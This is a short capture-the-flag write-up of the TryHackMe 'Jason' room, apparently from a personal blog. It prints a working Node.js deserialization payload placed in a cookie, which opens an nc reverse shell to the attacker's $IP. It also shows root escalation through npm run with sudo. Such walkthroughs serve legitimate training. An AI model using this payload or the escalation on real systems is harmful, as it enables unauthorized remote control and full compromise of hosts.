TryHackME: Jason

Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78

Let’s take a look at the website.

Let’s enter something and look at the request in Burp.

And we see it is built with Node.js. I figured there would be a vulnerability related to JSON and Node.js, so I researched a bit and found out that there is an RCE vulnerability in the way the serialized cookie is unserialized.

I prepared the following payload for the operation.

{"email":"test","rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Since the payload has to go into the cookie, I encode it with base64.

Let’s paste to the cookie and listen.

When we refresh the page, we get a shell.

Privilege Escalation

Command: sudo -l

npm can be run with sudo, so let’s exploit that.

Command: TF=$(mktemp -d)

Command: echo '{"scripts": {"preinstall": "/bin/bash"}}' > $TF/package.json

Command: sudo /usr/bin/npm -C $TF --unsafe-perm i

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
